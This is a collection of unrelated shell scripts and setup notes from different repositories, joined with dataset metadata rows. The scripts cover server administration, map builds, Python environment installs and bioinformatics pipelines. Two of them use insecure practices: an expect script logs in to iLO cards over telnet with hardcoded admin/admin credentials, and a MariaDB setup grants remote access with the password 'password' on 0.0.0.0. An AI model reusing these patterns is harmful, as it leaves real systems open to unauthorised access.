# NOTE(review): USERNAME is assigned but never used in the ssh command.
FILENAME=$1
USERNAME=root
# -n keeps ssh from consuming the loop's stdin (the host list).
while read MACHINE
do
  echo "Showing space on $MACHINE"
  ssh -n $MACHINE df -h
done < $FILENAME
| true
|
bfd177f6121095a436b83b8faffe212d1ddd4d08
|
Shell
|
WIEQLI/devenv
|
/install_linux/install_oh_my_git.sh
|
UTF-8
| 151
| 2.5625
| 3
|
[] |
no_license
|
set -e
# Clone oh-my-git into $DEV_HOME/development (skipped when already present).
# Fail fast with a clear message when DEV_HOME is unset — the original
# silently tested the bogus path "/development/oh-my-git".
: "${DEV_HOME:?DEV_HOME must be set}"
if [ ! -d "$DEV_HOME/development/oh-my-git" ]; then
	cd "$DEV_HOME/development"
	git clone https://github.com/arialdomartini/oh-my-git.git
fi
| true
|
b60fa34c45c66af6a4482b67bf17d069f579d274
|
Shell
|
supunj/sl2garmin
|
/map_locations.sh
|
UTF-8
| 923
| 2.515625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#Author: Supun Jayathilake (supunj@gmail.com)
#
# Central definition of every path, tool and device used by the Sri Lanka
# Garmin map build. All locations are resolved relative to this script.

# Resolve the directory this script lives in (quoted so paths with spaces work).
MAP_ROOT="$(dirname "$(readlink -f "$0")")"

# Content locations
TEMP_LOC="$MAP_ROOT/tmp"
STYLE_LOC="$MAP_ROOT/resources/style"
TYP_LOC="$MAP_ROOT/resources/typ"
MP_LOC="$MAP_ROOT/maps/mp"
OSM_LOC="$MAP_ROOT/maps/osm"
IMG_LOC="$MAP_ROOT/garmin"
OTHER_IMG_LOC="$MAP_ROOT/maps/img"
PBF_LOC="$MAP_ROOT/maps/pbf"
GPI_LOC="$MAP_ROOT/gpi"
#ICON_LOC=$MAP_ROOT/resources/icon
ARG_LOC="$MAP_ROOT/arg"
PG_LOC="$MAP_ROOT/pg"

# Tools
MKGMAP="$MAP_ROOT/tools/mkgmap/dist/mkgmap.jar"
#MKGMAP_ALT=$MAP_TOOLS_LOC/mkgmap/dist/mkgmap.jars
OSMOSIS_LOC="$MAP_ROOT/tools/osmosis/package"
OSMOSIS="$OSMOSIS_LOC/bin/osmosis"

# Devices (mount points when a Garmin unit / SD card is plugged in)
DEVICE_1="/media/$USER/GARMIN"
DEVICE_2="/media/$USER/GARMIN_SD"

# Files
COASTLINE="$OSM_LOC/sri_lanka_coastline.osm"
SOURCE_MAP_MP="$MP_LOC/sri_lanka_base.mp"
SOURCE_MAP_PBF="$PBF_LOC/sri-lanka-latest.osm.pbf"

# JVM used by mkgmap and its memory/assertion flags.
export MKGMAP_JAVACMD=/usr/bin/java
export MKGMAP_JAVACMD_OPTIONS="-Xmx2048M -jar -enableassertions"
| true
|
48bb6bee65ebcafa30240f40caca789475b685c8
|
Shell
|
shanky123/test-cluster
|
/node_mgmt/node_warrior.sh
|
UTF-8
| 297
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
# Logs in to HP ILO-card and resets the system
# Change user and password to fit your system
#
# Usage: node_warrior.sh NODE
#   Connects via telnet to host "ipmi-NODE" and issues a hard reset.
#   The here-doc delimiter is unquoted, so $1 is expanded by the shell
#   before expect ever sees the script.
# NOTE(review): credentials are hardcoded (admin/admin) and sent in clear
# text over telnet — confirm this is acceptable on this management network.
expect << EOF
set timeout 20
spawn telnet ipmi-$1
expect "login: "
send "admin\r"
expect "Password: "
send "admin\r"
expect "*>"
send "reset system1\r"
expect "*>"
send "exit\r"
EOF
| true
|
a95709292bebecff6bfc233da889112653cf3a7d
|
Shell
|
testee256/.dotfiles
|
/tools/find-by-time.sh
|
UTF-8
| 224
| 3.21875
| 3
|
[
"Unlicense"
] |
permissive
|
#!/usr/bin/env bash
# List files named NAME under DIR with mtime, size and path, piped to sort.
#
# Usage: find-by-time.sh DIR NAME [SORT_ARGS...]
#   Extra arguments are passed to sort; default is "-n -r" (newest first).
set -e

# Fail with a usage message instead of letting find error on empty args.
FIND_DIR=${1:?usage: $0 DIR NAME [sort-args...]}
FIND_NAME=${2:?usage: $0 DIR NAME [sort-args...]}
if [ ! -z "${3:-}" ]; then EXTRA_ARGS="${@:3}"; else EXTRA_ARGS="-n -r"; fi

# EXTRA_ARGS is deliberately unquoted: it carries multiple sort options.
find "$FIND_DIR" -name "$FIND_NAME" -printf "%Ty-%Tm-%Td %TH:%TM:%.2TS %12s %p\n" | sort $EXTRA_ARGS
| true
|
72638fa96a40908c7150836002b1f6f21d107010
|
Shell
|
MalikHesham/Bash-Project
|
/disable_site.sh
|
UTF-8
| 359
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
# this script takes the website name from the user and disables it
# exit code 0 : success
# (fixed: the original shebang was "#!/bash/bash", a non-existent path)
read -r -p "Enter the site name to be disabled: " WEBSITE
cd /etc/apache2/sites-available || exit 1
a2dissite "$WEBSITE.conf"
echo "$WEBSITE was disabled successfully"
# reloading apache2 to effects are done
echo "restarting apache2 ..."
service apache2 reload
exit 0
| true
|
7af1f651c0f01bfc2dafd7e7fdbd33ca9cf70af0
|
Shell
|
ttripp/searchlight-ui
|
/tools/gate/integration/post_test_hook.sh
|
UTF-8
| 419
| 3.015625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This script will be executed inside post_test_hook function in devstack gate
set -x
DIR=${BASH_SOURCE%/*}
source "$DIR/commons" "$@"

set +e
cd /opt/stack/new/searchlight-ui
sudo -H -u stack tox -e py27integration
retval=$?
set -e

# Copy integration-test screenshots into the Jenkins workspace.
# (fixed: the original cp was split across two lines without a trailing
# backslash, so cp ran with one argument and the destination path on the
# next line was executed as a command)
if [ -d "${SEARCHLIGHT_UI_SCREENSHOTS_DIR}/" ]; then
  cp -r "${SEARCHLIGHT_UI_SCREENSHOTS_DIR}/" \
    /home/jenkins/workspace/gate-searchlight-ui-dsvm-integration/
fi
exit $retval
| true
|
00055f1ba78db26baaa44f9f9133cd0b8a44b081
|
Shell
|
mafm/asif
|
/bin/legalityTest.sh
|
UTF-8
| 297
| 2.796875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Run the legality test for one .pts program. Must be launched from the
# directory containing this script — all paths below are relative to it.
if [ "$(dirname "$0")" != "." ]
then
	echo "You should run this from its directory. Run:"
	echo "  cd $(dirname "$0")"
	echo "and try again. :)"
	exit 1
fi

src=$1   # NOTE(review): assigned but never used below — confirm whether needed
base="$(basename "$1" | sed 's/\.pts//')"
ast=examples/pgms/$base

cd systemu || exit 1
./.cabal-sandbox/bin/runLegalityTest "$ast"
| true
|
60470de947280a4b1c1c32cf2dd6f7ce3f840b68
|
Shell
|
biomechanics-hlrs-gebert/M-ROT-Rotational-Tensor-Optimization
|
/manage_geb-lib.sh
|
UTF-8
| 841
| 3.4375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# ----------------------------------------------------------------------------------------
# Johannes Gebert - Doctoral project - initialize the subtree of the Geberts Library
#
# Author: Johannes Gebert - HLRS - NUM - gebert@hlrs.de
# Created: 27.12.2021
# Last edit: 27.02.2022
# ----------------------------------------------------------------------------------------
# Update the subtree
#
# Abort early when git is unavailable; the original only warned and then
# failed on the `git subtree` call anyway. `command -v` replaces the
# non-portable `which`.
if ! command -v git > /dev/null 2> /dev/null; then
    echo "Git not found." >&2
    echo "The program cannot get updates from this directory." >&2
    echo "The program cannot compile if the »geb-lib« directory ist missing." >&2
    exit 1
fi
#
# Pull when the subtree already exists, otherwise add it for the first time.
if [ -d "$PWD/geb-lib" ]; then
    operation="pull"
else
    operation="add"
fi
#
git subtree $operation --prefix \
    geb-lib git@github.com:biomechanics-hlrs-gebert/A-GLI-Geberts-Library.git \
    main --squash
| true
|
4dd0f270ce293ef818a72686632abb2278ae94c0
|
Shell
|
bebyx/dtapi
|
/db.sh
|
UTF-8
| 1,023
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/sh
# Provision a MariaDB server on Debian 10 for the dtapi web app: harden the
# root account, create the app database and user, open remote access, and
# import the seed dump.
export DEBIAN_FRONTEND=noninteractive
# Update Debian10 and install needed packages
apt update && apt upgrade -y
apt install mariadb-server wget -y
# Run mysql_secure_installation script
# (same hardening the interactive script performs: blank root password,
# drop remote root logins, anonymous users and the test database)
mariadb -u root <<-EOF
UPDATE mysql.user SET Password=PASSWORD('') WHERE User='root';
DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1');
DELETE FROM mysql.user WHERE User='';
DELETE FROM mysql.db WHERE Db='test' OR Db='test_%';
FLUSH PRIVILEGES;
EOF
# Create web app database and assign user
# NOTE(review): 'dtapi'@'%' with the literal password 'password' permits
# remote logins — confirm this is intended outside a lab/VM setup.
mariadb -u root <<-EOF
CREATE DATABASE dtapi;
GRANT ALL ON dtapi.* TO 'dtapi'@'%' IDENTIFIED BY 'password' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EOF
# Let database be publicly reachable
sed -i.bak '/bind-address/ s/127.0.0.1/0.0.0.0/' /etc/mysql/mariadb.conf.d/50-server.cnf
# Import mysql dump into web app database
wget -q https://dtapi.if.ua/~yurkovskiy/dtapi_full.sql
mariadb -u root dtapi < ./dtapi_full.sql
# Restart mysql service to enable new mysql config
systemctl restart mysql
| true
|
47224ee93cbc09e0a0401621719a083371299ddc
|
Shell
|
orial/Procesadores-de-Lenguajes
|
/JPL/runtest
|
UTF-8
| 945
| 4.25
| 4
|
[] |
no_license
|
#!/bin/bash
# Usage: `./runtest` will run all the tests under the `test` directory
#        `./runtest test/NAME.pl` will run only the given test
passed_test=0;

# Compile one test program with both the reference compiler (bin/jplc) and
# the student compiler (JPLC), execute both results, and compare stdout.
# $1 path to the exercise
# $2 counter if any
correct_exercise () {
  # Compile solution
  bin/jplc "$1" solution.j;
  # Compile exercise
  java -cp bin:../lib/java-cup-11b-runtime.jar JPLC "$1" exercise.j;
  # Run solution and execute
  solution=$(./jpl solution 1);
  # Run jasmin on exercise and execute
  exercise=$(./jpl exercise 1);
  name=$(basename "$1")
  # Remove files
  rm -f solution.j exercise.j;
  # Quoted RHS: the original `[[ $solution == $exercise ]]` was a glob
  # match, which misfires when expected output contains *, ? or [].
  if [[ "$solution" == "$exercise" ]]
  then
    echo "${2-1}. ${name} Ok!";
    passed_test=$((passed_test+1));
  else
    echo "${2-1}. ${name} ERROR! Expected: ${solution} Given: ${exercise}";
  fi
}

# Explicit -n test instead of `[ $1 ]`, which breaks on args with spaces.
if [ -n "${1:-}" ]
then
  correct_exercise "$1";
else
  count=0;
  for filename in test/*;
  do
    correct_exercise "$filename" "$count";
    count=$((count+1));
  done
  echo "Nº of Ok!: ${passed_test}/${count}";
fi
| true
|
c37c4a588544edc89a42b4acf82e34ca28fe15e0
|
Shell
|
staneleigh/kodi_aio
|
/dialog_scripts/networking/wifi_settings.sh
|
UTF-8
| 2,252
| 3.6875
| 4
|
[] |
no_license
|
#!/bin/bash
#wifi-configuration
#V1.0.0.0.A
#
# Interactive wifi setup dialog (whiptail) for the kodi_aio installer.
# Reads globals:  nw_iface, nw_wifi_present, headline
# Writes globals: nw_wifi_ssid, nw_wifi_psk, nw_iface
# The "3>&1 1>&2 2>&3" swaps let us capture whiptail's answer, which it
# writes to stderr.
if [[ $nw_iface != *eth* ]] && [ "$nw_wifi_present" = "true" ]
	then
	#ask for wifi configuration
	if (whiptail --backtitle "$headline" --title "Configure Wifi" \
	--yesno "\nWifi was selected as primary network interface but is not configured yet. \nDo you want to do this now? \n " 15 100)
		then
		#SSID for wifi-configuration
		# Re-prompt until the user enters a non-empty SSID.
		unset valid
		while [ -z "$valid" ]; do
			input=`whiptail --backtitle "$headline" \
			--title "WiFi-configuration - SSID" \
			--inputbox "\nConfirm or enter the SSID (network name) \nfor your wifi-configuration \n\n " 15 100 "YourNetworkName" 3>&1 1>&2 2>&3`
			nw_wifi_ssid=$input
			if [ -z "$input" ]
				then
				whiptail --backtitle "$headline" \
				--title "Wrong input" \
				--msgbox "\nYou didn't enter anything! :-(. \n\nPlease try again" 15 100
				unset valid
			else
				valid="ok"
			fi
		done
		#PSK for wifi-configuration
		# Same loop for the pre-shared key.
		unset valid
		while [ -z "$valid" ]; do
			input=`whiptail --backtitle "$headline" \
			--title "WiFi-configuration - PSK" \
			--inputbox "\nConfirm or enter the PSK (pre-shared-key) for your wifi-configuration \n\n " 15 100 "YourNetworkPass" 3>&1 1>&2 2>&3`
			nw_wifi_psk=$input
			if [ -z "$input" ]
				then
				whiptail --backtitle "$headline" \
				--title "Wrong input" \
				--msgbox "\nYou didn't enter anything! :-(. \n\nPlease try again" 15 100
				unset valid
			else
				valid="ok"
			fi
		done
		#determine wifi nic
		# NOTE(review): assumes legacy wlanX interface naming; modern
		# systemd names (wlpXsY) will not match — confirm target platform.
		nw_iface=$(ifconfig -a | grep ^wlan.* | awk '{print $1}')
	fi
fi
| true
|
67febbdcfd505192d80ad42b80711d59c075d696
|
Shell
|
un-knower/data-base
|
/api-test/py-test/Part4_FlaskWeb/c00_腾讯云安装python2.7.sh
|
UTF-8
| 7,757
| 2.859375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# go2infc 原本就有 python2.7 环境,需要安装pip2.7
alias go2infc="ssh 10.47.200.3"
# go127 只有 python2.6,需要安装 python2.7 和 pip2.7
alias go127="ssh 10.47.200.127"
# go203 原先只有python2.6环境,通过tar包成功安装 python2.7, 然后再补 pip2.7
alias go203="ssh 10.47.200.203"
###### 一、 go2infc 基于已有python2.7 创建虚拟环境
# 1)检查当前 pip 版本,不符合要求
pip --version
# pip 9.0.3 from /usr/lib/python2.6/site-packages (python 2.6)
# 2) 升级失败 SSL 协议被封
sudo pip install -U pip 升级失败
# 3) 成功检查到 python2.7 环境
python2.7
#Python 2.7.6 (default, Feb 10 2014, 12:41:37)
#[GCC 4.4.7 20120313 (Red Hat 4.4.7-3)] on linux2
#Type "help", "copyright", "credits" or "license" for more information.
#>>>
# 4) 使用现有 旧pip,安装 virtualenv
pip install virtualenv
# 5) 创建虚拟环境目录 并 开放权限
sudo mkdir /usr/local/penv2.7
sudo chmod 755 /usr/local/penv2.7
# 6) 基于现有的 python2.7 安装 虚拟环境,出现如下提示,即说明成功安装了整套 python2.7 环境到 /usr/local/penv2.7 目录
sudo virtualenv penv2.7 --python=python2.7
#New python executable in /usr/local/penv27/bin/python2.7
#Also creating executable in /usr/local/penv27/bin/python
#Installing setuptools, pip, wheel...done.
# 7) 激活虚拟环境 并查看 pip 版本
source /usr/local/penv2.7/bin/activate
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ pip --version
#pip 18.0 from /usr/local/penv27/lib/python2.7/site-packages/pip (python 2.7)
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ exit()
# 8)注销虚拟环境命令 (慎用)
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ deactivate
# 9)配置别名
sudo vim /etc/profile
alias python2.7="/usr/local/penv2.7/bin/python2.7"
alias pip2.7="/usr/local/penv2.7/bin/pip2.7"
source /etc/profile
#10) 测试
#pip2.7 install flask
# Downloading https://files.pythonhosted.org/packages/00/a4/cd587b2b19f043b65bf33ceda2f6e4e6cdbd0ce18d01a52b9559781b1da6/Flask-Script-2.0.6.tar.gz (43kB)
# 100% |████████████████████████████████| 51kB 138kB/s
#Collecting Flask (from flask-script)
###### 二、 go127 从无到有创建 python2.7 pip2.7 环境
# 经过多方测试,发现直接 在2.6.32-573.el6.x86_64 机器上 基于源码安装 Python2.7 都会失败,目前唯一对策是,拷贝 go2infc
# 已经成功安装的penv2.7环境到 go127 上,期待能够正常运行,或至少能够成功运行 python2.7 环境
#[huhao1@bi-infoc-txygz3-2 ~]$ uname -a
#Linux bi-infoc-txygz3-2 2.6.32-573.el6.x86_64 #1 SMP Thu Jul 23 15:44:03 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
# 1) go2infc 机器上打包现有的 python2.7 环境,并通过 rz 命令 传送到本地
sudo tar -zcvf penv2.7.tar.gz /usr/local/penv2.7
rz /usr/local/penv2.7.tar.gz
# 2)从本地将 penv2.7.tar.gz 发送到 go127
# 经测试 sz -b 命令传送文件会出现乱码,每次都传送失败,改用 nc 启动 tcp服务传送
# 接受端执行 curl httpbin.org/ip 获取,其外网地址
curl httpbin.org/ip
{
"origin": "118.89.34.125"
}
# 接收端先开启 nc 接受服务 (监听随意指定的8003端口,将接受的文件保存为penv2.7.tar.gz)
nc -l 8003 > penv2.7.tar.gz
# 发送端开始发送
nc 118.89.34.125 8003 < penv2.7.tar.gz
# 接受端成功接受后,会自动退出nc服务,解压,并移动到 /usr/local 目录
tar -zxvf penv2.7.tar.gz
sudo mv penv2.7 /usr/local/
# 3)安装virtualenv
pip install virtualenv
# 4)激活拷贝过来的 虚拟环境,发现直接进入了虚拟环境命令行,并可成功使用 python2.7 环境,但pip2.7 不能正常使用
source /usr/local/penv2.7/bin/activate
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ python2.7
#(penv27) Python 2.7.6 (default, Feb 10 2014, 12:41:37)
#(penv27) [GCC 4.4.7 20120313 (Red Hat 4.4.7-3)] on linux2
#(penv27) Type "help", "copyright", "credits" or "license" for more information.
#(penv27) >>>
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ pip --version
#Traceback (most recent call last):
# File "/usr/local/penv27/bin/pip2.7", line 7, in <module>
# from pip._internal import main
# File "/usr/local/penv2.7/lib/python2.7/site-packages/pip/_internal/__init__.py", line 2, in <module>
# from __future__ import absolute_import
# 5)重新回到了 go2infc 当初安装pip2.7 的环境
# 创建新虚拟环境目录
sudo mkdir /usr/local/penv27
sudo chmod 755 /usr/local/penv27
# 6) 基于现有的 python2.7 环境,重新再/usr/local/penv27 目录下安装一套新的python2.7,pip2.7环境
sudo virtualenv penv2.7 --python=/usr/local/penv2.7/bin/python2.7
#New python executable in /usr/local/penv27/bin/python2.7
#Also creating executable in /usr/local/penv27/bin/python
#Installing setuptools, pip, wheel...done.
# 7) 激活虚拟环境 并查看 pip 版本 Ctrl+D 退出
source /usr/local/penv2.7/bin/activate
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ pip --version
#pip 18.0 from /usr/local/penv27/lib/python2.7/site-packages/pip (python 2.7)
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ exit()
# 8)配置别名
sudo vim /etc/profile
alias python2.7="/usr/local/penv27/bin/python2.7"
alias pip2.7="/usr/local/penv27/bin/pip2.7"
source /etc/profile
# 9)测试 (大功告成)
#pip2.7 install flask
# Downloading https://files.pythonhosted.org/packages/00/a4/cd587b2b19f043b65bf33ceda2f6e4e6cdbd0ce18d01a52b9559781b1da6/Flask-Script-2.0.6.tar.gz (43kB)
# 100% |████████████████████████████████| 51kB 138kB/s
#Collecting Flask (from flask-script)
###### 一、 go203 参照 go127 从无到有 安装pip2.7失败,线上机器已经存在的 pip 不存在 re 模块
# 1)参照 go127 1~4)操作成功拷贝现有 penv2.7.tar.gz 解压到 /usr/local
# 2)下载 源码,成功安装
wget http://python.org/ftp/python/2.7.3/Python-2.7.3.tar.bz2
tar -jxvf Python-2.7.3.tar.bz2
./configure
cd Python-2.7.3
make all
sudo make install
python2.7
#Python 2.7.3 (default, Feb 10 2014, 12:41:37)
#[GCC 4.4.7 20120313 (Red Hat 4.4.7-3)] on linux2
#Type "help", "copyright", "credits" or "license" for more information.
#>>>
# 3) 接下来情况与go2infc 一致了
# 创建新虚拟环境目录
sudo mkdir /usr/local/penv27
sudo chmod 755 /usr/local/penv27
# 4) 基于现有的 python2.7 环境,重新再/usr/local/penv27 目录下安装一套新的python2.7,pip2.7环境
sudo virtualenv penv2.7 --python=/usr/local/penv2.7/bin/python2.7
#New python executable in /usr/local/penv27/bin/python2.7
#Also creating executable in /usr/local/penv27/bin/python
#Installing setuptools, pip, wheel...done.
# 5) 激活虚拟环境 并查看 pip 版本 Ctrl+D 退出
source /usr/local/penv2.7/bin/activate
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ pip --version
#pip 18.0 from /usr/local/penv27/lib/python2.7/site-packages/pip (python 2.7)
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ exit()
# 6)配置别名
sudo vim /etc/profile
alias python2.7="/usr/local/penv27/bin/python2.7"
alias pip2.7="/usr/local/penv27/bin/pip2.7"
source /etc/profile
# 7)测试 (大功告成)
#pip2.7 install flask
# Downloading https://files.pythonhosted.org/packages/00/a4/cd587b2b19f043b65bf33ceda2f6e4e6cdbd0ce18d01a52b9559781b1da6/Flask-Script-2.0.6.tar.gz (43kB)
# 100% |████████████████████████████████| 51kB 138kB/s
#Collecting Flask (from flask-script)
# 8) Batch-manage dependencies with pip
# Record the dependencies the project uses into a file
# (fixed: the original `pip freeze requirements.txt` lacked the redirect)
pip freeze > requirements.txt
# Install the dependency list to restore the environment
# (fixed: filename typo `equirements.txt`)
pip install -r requirements.txt
| true
|
de778ac85d23434ea9b6aea1e1ec95e8faa6c95a
|
Shell
|
RaoKarter/manifold_0_12_ei
|
/manifold-ipa/code/simulator/SPXQsim/run.sh
|
UTF-8
| 492
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
# Run the smp_llp_con_dvfs simulator over every benchmark, one log per case.
trap 'exit 1' 1 2 15

#export LD_LIBRARY_PATH=$QSIM_PREFIX/lib
export QSIM_PREFIX=/home/hugh/Project/HARDWARE/ME/local_install/qsim-root
export LD_LIBRARY_PATH=/home/hugh/Project/HARDWARE/ME/local_install/qsim-root/lib

mkdir -p results

# Iterate with a glob instead of parsing `ls` output (robust to odd names).
# NOTE(review): cases are enumerated from ./benchmarks3/ but executed from
# ./benchmarks/ — confirm this mismatch is intentional.
for testpath in ./benchmarks3/*; do
	[ -e "$testpath" ] || continue
	testcase=${testpath##*/}
	echo "$testcase"
	./smp_llp_con_dvfs conf_llp.cfg.bst.ss outorder.config.ss qsim_lib state.16 16core_ooo.config.ss "./benchmarks/$testcase" >"./results/$testcase.best.log" 2>&1
done
| true
|
e54ac171123ca3071580208488e6c44a20e7f02e
|
Shell
|
baconslayer/commons
|
/calc_checkout/checkout-support/checkoutServer.sh
|
UTF-8
| 1,593
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
# Validate a calc_checkout server deployment: helper libraries sourced below
# provide argument parsing (parse_line_arguments) and the per-file
# validation routine (validateByInputFile).
CHECKOUT_DIR=./calc_checkout
TEST_CONNECTIONS_SCRIPT=./testConnections.sh

. ./main.functions
. ./parse.args.functions
. ./file.functions
. ./config.entry.functions
. ./test.connection.functions
# Validate this host's deployment config.
# Uses validateByInputFile (from the sourced *.functions files) against the
# common and server data files, plus an optional per-application file.
# Reads the APPNAME global set by parse_line_arguments.
function validateServer()
{
   echo ""
   echo "Validating Server Deployment for $APPNAME on $(host -t RP $(hostname))"
   validateByInputFile ../conf/common.file.data
   validateByInputFile ../conf/server.file.data
   # Per-application overrides are optional.
   if [ -f ../conf/$APPNAME.server.file.data ]; then
      validateByInputFile ../conf/$APPNAME.server.file.data
   fi
   echo ""
}
# Print usage information for this script on stdout.
function howToUse()
{
  cat <<USAGE
$0
 -appname [wfsm-app|wfsmcc-app]
 -serverClass ecom
 -level [level1|level2|level3|level4|level5|test|prod]
 -verbose
 -site [a|b]
 
Example for L1 non Credit Card Cluster:
$0 -serverClass ecom -level level1 -site a
USAGE
}
########
######## MAIN
########
# No arguments: print usage and stop.
if [ $# -eq 0 ]; then
   howToUse
   exit
else
   parse_line_arguments $@
fi

# APPNAME/SERVER_CLASS/LEVEL are set by parse_line_arguments; all three
# are mandatory (SITE is optional).
if [ -z "$APPNAME" -o -z "$SERVER_CLASS" -o -z "$LEVEL" ]; then
   echo "Missing arguments."
   echo "appname=$APPNAME serverClass=$SERVER_CLASS level=$LEVEL site=$SITE"
   howToUse
   exit
fi

if [ "$VERBOSE" = "TRUE" ]; then
   echo "appname=$APPNAME serverClass=$SERVER_CLASS level=$LEVEL site=$SITE"
fi

echo "------------------------------------------------------------"
# NOTE(review): this variable is computed but never used afterwards
# (validateServer re-runs `host` itself) — confirm whether it is needed.
hostname=$(host -t RP $(hostname) | cut -d ' ' -f 6 | sed -e 's/\.$//')
validateServer
echo "------------------------------------------------------------"
# end of script
|
1b9c2e46efdb93af9855643234d6c9baf3029adb
|
Shell
|
bakerwm/test_perl
|
/old_versions/create_mapping_results.sh
|
UTF-8
| 5,827
| 2.609375
| 3
|
[] |
no_license
|
From Clean fasta to soap & match_genome
1. Soap >> (Bi server, 1 cpu for each job)
(1) 45SE & 81SE: -M 0 -r 2 -v 0 -p 1
example: soap -a clean.fa -D NC_000962.fna.index -o Rv_45SE.soap -u Rv_45SE.unmap -M 0 -r 2 -v 0 -p 1
(2) 90PE: -m2 -r 2 -v 2 -p 1 -x 1000 -s 40 -l 32 -o out.soapPE -2 out.soapSingle
example: soap -a Rv_1.fq -b Rv_2.fq -D NC_000962.fna.index -o Rv_200PE.soap -2 Rv_200PE.soapSingle -m2 -r 2 -v 2 -p 1 -x 1000 -s 40 -l 32
2. Trans Soap:
(1) match_genome.txt [7-line tab-delimited file]: <tag_id> <genome_id> <begin> <end> <strand> <sequence> <exp>
a. SE soap:
"soap2txt_v1.pl"
usage: soap2txt_v1.pl clean.fa *.soap
b. PE soap:
"soapPE2SE.pl"
usage:
merge.pl Rv_L1.PESoap 1>Rv_L1_genome.txt 2>length_vs_number_Rv_L1_genome.txt
(2) coverage [3-line tab-delimited file]: <genome_id> <position> <coverage>
"soap.coverage"
usage: soap.coverage -cvg -i *.soap -refsingle H37Rv.fna -o result.txt -depthsingle H37Rv_45SE.cov
"CovTrans.pl"
Usage: perl CovTrans.pl in.cov result.out Genome_fna out.coverage
Note:
1. Infile is the result from soap.coverage -depthsingle
2. Length is the result from soap.coverage -o
3. The genome fasta file used for soap
4. The result file
3. Get seed sequence:
(1) get seed sequence from coverage file.
"get_lncRNA_v2.pl"
usage: perl get_lncRNA_v2.pl -i coverage -s strand -c cutoff -o outfile
Options:
-i <file> : coverage file, 3-line tab-delimited file in the following format:
<Genome_ID> <Position> <Coverage>
Position should be continuous from 1 to end.
-s [+/-] : The strand.
-c [0-1] : The cutoff [0-1] to determin the edge. Default 0.5 .
-o <file> : The result file.
(2) Format transformation.\
"getPosition.pl"
Usage: perl /home/wangming/work/bin/get_sRNA/getPosition.pl infile gff strain_id > outfile
Note:
-1 : The input file in the following format:
<ID> <Strand> <Begin:Cov> <Max:Cov> <End:Cov>
-2 : The GFF file. GFF3 recommend.
-3 : The Strain name, help to recognize the GFF file.
Example: perl getPosition.pl H37Rv_45SE.temp NC_000962.gff H37Rv >H37Rv_45SE_lncRNA.txt
(3) Calculate rpkm in each library.
"?"
...
(4) Merge sRNA files from different libraries.
"merge4all.pl"
Usage: perl merge4all.pl -n 4 -i in_1,in_2,in_3,in_4 -o outfile
Options:
-n <Integer> :the number of input files
-i <file> :input files
-o <file> :output file
-h :show this help
Note: For multiple input files,
1. Filename like this, "45SE_H37Rv_*". eg: 45SE_H37Rv.txt
2. Multiple input filenames join by comma ",". eg: "infile_1,infile_2"
Description:
1. Two sequences have an overlap longer than 1/2 of one of the
sequence or longer than 20 nt will merge into a new one.
(match_length > 1/2 of input or 20 nt)
2. The expression level between sequences should not more than
100-fold.
(Max_exp/exp <= 100)
(5) RNA classification.
"sort2candi_v1.pl"
Usage: perl sort2candi_v1.pl infile
Note: the rules to select sRNA
1. at IGR or AS.
2. >=100 bp from 5' ORF and >=60 bp from 3' ORF.
==========================================================================================
End of file
==========================================================================================
>> Used command lines.
#command lines.
From rpkm.txt to merge lncRNA.txt.
get_work_shell.pl
[getPosition.pl, get_sRNA_sh.pl sort2candi_v1.pl sort2temp.pl]
From FastA files to rpkm.txt.
From match_genome to mapping.
(1)
Cal_sRNA_end.pl
getRscript.pl
Rscript *.R
(2)
Cal_sRNA_end.pl
match_v2.pl
getRscript_v2.pl
Rscript *.R
perl ~/work/bin/merge.pl 200PE_rpkm.txt 140PE_rpkm.txt 81SE_rpkm.txt 45SE_rpkm.txt >merge.txt
perl ~/work/bin/pick_merge_sRNA.pl merge.txt >merge.temp
perl ~/work/bin/getPosition.pl NC_000962.gff merge.temp >merge_lncRNA.txt
perl ~/work/bin/sort2candi_v3.pl merge_lncRNA.txt
# check reads mapping coverage on each mRNA.
Declaration:
1. Prepare samples.
2. Change file name.
3. Confirm parameters.
Step 1. Clean fasta file.
1. SOAP or BWA or Bowtie
2. match_genome.txt
3. Poscoverage.txt
4. Match genome/mRNA statement.
Step 2. Get sRNAs.
1. Statistic poscoverage, 5', 3' and read.
2. Merge different libraries. Twice.
3. Get position.
4. Find sRNAs.
Process:
1. Begin with:
a. match_genome.txt files,
b. Genome annotation files: GFF, fna,
2. make dir for match_genome and annotation files.
$ mkdir H37Rv_match_genome/ database/ # change file name to "match_genome.45SE.txt";
$ perl run_statPoscov.pl H37Rv_match_genome/
"45SE"_3end.mapping.txt
3. Merge sRNAs from different libraries.
$ perl merge4all -n 4 -i files,files -o outfile
$ perl sort2temp.pl outfile
$ perl getPosition GFF outfile.temp
$ perl sort2candi_v3.pl outfile.txt
Step 3. Statistic sRNAs mapping tRNA/rRNA/pub_RNA...
a. draw input file coverage map.
$ mkdir mRNA_maps
$ ln -s genome_mapping.txt ./
$ perl stat3end.pl
$ perl stat5end.pl
$ perl statPoscov.pl
$ perl creat_title_dir.pl
$ perl getRscript.pl
$ Rscript *R
b. draw sRNAs mapping input files.
$ perl mkdir mRNA_match_sRNA
$ perl match.pl sRNAs inputfile
$ perl stat3end.pl
$ perl stat5end.pl
$ perl statPoscvo.pl
$ perl creat_title_dir.pl
$ perl getRscript_v2.pl infile total_line total_seed
$ Rscript input2pdf.R
rm di
Step 4. Summary
